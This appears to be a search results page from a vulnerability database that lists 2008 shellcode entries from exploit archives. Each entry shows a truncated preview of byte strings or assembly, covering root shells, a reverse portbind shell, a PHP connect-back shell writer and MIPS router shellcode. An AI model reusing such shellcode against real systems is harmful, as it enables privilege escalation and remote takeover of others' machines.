Lucene search
K

7259 matches found

seebug.org
seebug.org
added 2008/08/22 12:0 a.m.13 views

freebsd/x86 encrypted shellcode /bin/sh 48 bytes

No description provided by source. / Encoded SUB shellcode execve /bin/sh of 48 bytes by [email protected] c0d3z3r0 Hack 'n Roll / char shellcode = "\x31\xd2" "\xeb\x0e" "\x31\xdb" "\x5b" "\xb1\x19" "\x83\x2c\x1a\x01" "\x42" "\xe2\xf9" "\xeb\x05" "\xe8\xed\xff\xff\xff" "\x32\xc1"...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2008/08/22 12:0 a.m.17 views

freebsd/x86 setuid(0); execve(ipf -Fa); shellcode 56 bytes

No description provided by source. ; sm4x - 2008 ; setuid0; execve"//sbin/ipf", "//sbin/ipf", "-Faa", 0, 0; ; 56 bytes ; FreeBSD 7.0-RELEASE global start start: main: ; --------------------- setuid 0 xor eax, eax xor ecx, ecx push eax ;0 mov al, 0x17 int 0x80 ; --------------------- -Faa xor eax,...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2008/08/22 12:0 a.m.19 views

Version-independent IOS shellcode

No description provided by source. Version-independent IOS shellcode, Andy Davis 2008 No hard-coded IOS addresses required The technique uses 4-byte signatures near references to the required addresses within the IOS "text" memory region. The addresses are then recovered from memory and used with...

7.1AI score
Exploits0
Exploit DB
Exploit DB
added 2008/08/21 12:0 a.m.29 views

Version-independent IOS shellcode

Version-independent IOS shellcode. Shellcode exploit for hardware platform Version-independent IOS shellcode, Andy Davis 2008 No hard-coded IOS addresses required The technique uses 4-byte signatures near references to the required addresses within the IOS "text" memory region. The addresses are...

0.1AI score
Exploits0
0day.today
0day.today
added 2008/08/21 12:0 a.m.16 views

freebsd/x86 setuid(0); execve(ipf -Fa); shellcode 57 bytes

Exploit for freebsd/x86 platform in category shellcode ========================================================== freebsd/x86 setuid0; execveipf -Fa; shellcode 57 bytes ========================================================== ; sm4x - 2008 ; setuid0; execve"//sbin/ipf", "//sbin/ipf", "-Faa", 0,...

7AI score
Exploits0
securityvulns
securityvulns
added 2008/08/21 12:0 a.m.59 views

Version-independent IOS shellcode

Hi, One of the biggest problems with IOS exploitation is that on every different version of IOS, the addresses required to execute useful shellcode are different. Therefore, hard-coded addresses were inserted into shellcode and this made exploits very version-dependent. I have been working on a w...

7.8AI score
Exploits0
Exploit DB
Exploit DB
added 2008/08/21 12:0 a.m.23 views

freebsd/x86 - setuid0; execveipf -Fa; shellcode 57 bytes

freebsd/x86 setuid0; execveipf -Fa; shellcode 57 bytes. Shellcode exploit for freebsdx86 platform ; sm4x - 2008 ; setuid0; execve"//sbin/ipf", "//sbin/ipf", "-Faa", 0, 0; ; 57 bytes ; FreeBSD 7.0-RELEASE global start start: main: ; --------------------- setuid 0 xor eax, eax xor ecx, ecx push eax...

0.4AI score
Exploits0
0day.today
0day.today
added 2008/08/21 12:0 a.m.20 views

Version-independent IOS shellcode

Exploit for hardware platform in category shellcode ================================= Version-independent IOS shellcode ================================= Version-independent IOS shellcode, Andy Davis 2008 No hard-coded IOS addresses required The technique uses 4-byte signatures near references to...

7AI score
Exploits0
0day.today
0day.today
added 2008/08/21 12:0 a.m.12 views

freebsd/x86 reverse portbind /bin/sh 89 bytes

Exploit for freebsd/x86 platform in category shellcode ============================================= freebsd/x86 reverse portbind /bin/sh 89 bytes ============================================= ; sm4x - 2008 ; reverse portbind /bin/sh ; NULL free if address is. ; setuid0; socket; connect; exit; ; ...

7AI score
Exploits0
seebug.org
seebug.org
added 2008/08/19 12:0 a.m.18 views

linux/86 setreuid(geteuid, geteuid) + execve(/bin/sh) shellcode

No description provided by source. / setreuidgeteuid, geteuid + execve/bin/sh shellcode - useful for wargames and the like. global start section .text start: ; geteuid push byte 49 pop eax int 0x80 ; setreuid mov ebx, eax mov ecx, eax push byte 70 pop eax int 0x80 ; execve xor eax,eax push eax pu...

7.1AI score
Exploits0
Exploit DB
Exploit DB
added 2008/08/19 12:0 a.m.26 views

linux/x86 shellcode generator / null free

linux/x86 shellcode generator / null free. Shellcode exploit for generator platform / BlackLight's shellcode generator for Linux x86 Tested anywhere, working & NULL-free Usage: ./generator ...and then you've got a ready2inject NULL-free shellcode for the command you like copyleft 2008 by BlackLig...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2008/08/19 12:0 a.m.39 views

linux/86 setreuidgeteuid, geteuid + execve/bin/sh shellcode

linux/86 setreuidgeteuid, geteuid + execve/bin/sh shellcode. Shellcode exploit for linx86 platform / setreuidgeteuid, geteuid + execve/bin/sh shellcode - useful for wargames and the like. global start section .text start: ; geteuid push byte 49 pop eax int 0x80 ; setreuid mov ebx, eax mov ecx, ea...

0.2AI score
Exploits0
0day.today
0day.today
added 2008/08/19 12:0 a.m.26 views

linux/x86 shellcode generator / null free

Exploit for generator platform in category shellcode ========================================= linux/x86 shellcode generator / null free ========================================= / BlackLight's shellcode generator for Linux x86 Tested anywhere, working & NULL-free Usage: ./generator ...and then...

7AI score
Exploits0
Exploit DB
Exploit DB
added 2008/08/19 12:0 a.m.26 views

freebsd/x86 - encrypted shellcode /bin/sh 48 bytes

freebsd/x86 encrypted shellcode /bin/sh 48 bytes. Shellcode exploit for freebsdx86 platform / Encoded SUB shellcode execve /bin/sh of 48 bytes by [email protected] Hack 'n Roll / char shellcode = "\x31\xd2" "\xeb\x0e" "\x31\xdb" "\x5b" "\xb1\x19" "\x83\x2c\x1a\x01" "\x42" "\xe2\xf9"...

7.4AI score
Exploits0
seebug.org
seebug.org
added 2008/08/19 12:0 a.m.6 views

linux/86 setreuid(geteuid geteuid) + execve(/bin/sh) shellcode

No description provided by source. / setreuidgeteuid, geteuid + execve/bin/sh shellcode - useful for wargames and the like. global start section .text start: ; geteuid push byte 49 pop eax int 0x80 ; setreuid mov ebx, eax mov ecx, eax push byte 70 pop eax int 0x80 ; execve xor eax,eax push eax pu...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2008/08/19 12:0 a.m.15 views

linux/x86 writes a php connectback shell to the fs 508 bytes

No description provided by source. include stdlib.h / Grayscale Research: Linux Write FS PHP Connect Back Utility Shellcode Function: Opens /var/www/cb.php and writes a php connectback shell to the filesystem. Shellcode Size: 508 bytes No Encodings PHP Shell Usage: // victim...

7.1AI score
Exploits0
0day.today
0day.today
added 2008/08/19 12:0 a.m.140 views

linux/x86 setreuid(geteuid, geteuid) + execve(/bin/sh) shellcode

Exploit for linux/x86 platform in category shellcode =============================================================== linux/x86 setreuidgeteuid, geteuid + execve/bin/sh shellcode =============================================================== / setreuidgeteuid, geteuid + execve/bin/sh shellcode -...

7AI score
Exploits0
0day.today
0day.today
added 2008/08/19 12:0 a.m.12 views

freebsd/x86 encrypted shellcode /bin/sh 48 bytes

Exploit for freebsd/x86 platform in category shellcode ================================================ freebsd/x86 encrypted shellcode /bin/sh 48 bytes ================================================ / Encoded SUB shellcode execve /bin/sh of 48 bytes by email protected Hack 'n Roll / char...

7AI score
Exploits0
seebug.org
seebug.org
added 2008/08/19 12:0 a.m.25 views

linux/mips (Linksys WRT54G/GL) execve shellcode 60 bytes

No description provided by source. / - MIPS little-endian - linux execve 60 bytes shellcode - execve"/bin/sh","/bin/sh",; - tested on Linksys WRT54G/GL DD-WRT Linux - based on scut paper Writing MIPS/Irix shellcode vaicebine at gmail dot com / include stdio.h char shellcode = "\x50\x73\x06\x24" /...

7.1AI score
Exploits0
0day.today
0day.today
added 2008/08/18 12:0 a.m.12 views

linux/mips (Linksys WRT54G/GL) port bind shellcode 276 bytes

Exploit for linux/mips platform in category shellcode ============================================================ linux/mips Linksys WRT54G/GL port bind shellcode 276 bytes ============================================================ / - MIPS little-endian - linux port listener 276 bytes shellco...

7AI score
Exploits0
Rows per page
Query Builder